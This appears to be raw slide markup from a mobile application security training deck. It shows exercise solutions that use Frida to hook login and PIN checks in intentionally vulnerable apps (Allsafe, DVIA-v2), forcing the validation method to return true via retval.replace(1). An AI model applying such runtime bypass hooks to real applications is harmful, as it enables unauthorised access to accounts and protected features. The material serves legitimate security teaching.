            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Usage :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>checkPin-bypass.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-pause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600"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62E07738-4885-4A28-A95C-F3853DC17126}"/>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a:t>Exercice 10 : Runtime Manipulation [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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344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dirty="0"/>
              <a:t>And …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594726" y="2940049"/>
          <a:ext cx="3747381" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3747381">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>What about iOS ?</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Stickers sur le thème Question Emoji | Redbubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1886D4-46CE-6586-86BF-F9B7387D1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558" y="3710562"/>
            <a:ext cx="1069716" cy="106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3834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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 1 : Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ObjC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>-observer » can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>manipulate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the application at runtime : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>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Runtime Manipulation</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206A86-7A91-4FF3-B47A-E7A634C5BA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1642360" y="2381422"/>
            <a:ext cx="5993176" cy="4210394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13804195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221559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 1 : Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Select Runtime Manipulation &gt; Start the challenge &gt; Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the login validation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -U DVIA-v2 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codeshare</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mrmacete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-observer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[iOS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::DVIA-v2]-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>observeSomething</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isLoginValidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*]’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-trace command to dump the source code of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-trace -FU -m "-[class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Change the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>generated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>fby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> rida-trace : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retval.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onLeave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> re-run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-trace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>retesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>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17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dirty="0"/>
              <a:t>Create a Virtual Device &gt; Select Nexus 5X</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="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err="1"/>
              <a:t>AndroidStudio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> – Virtual Device</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100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="63635" y="2869536"/>
            <a:ext cx="3289434" cy="2365834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525224" y="2079450"/>
            <a:ext cx="5542576" cy="3736106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526821" y="5331572"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6129212" y="5876313"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"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8818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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Option 1 : Frida</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
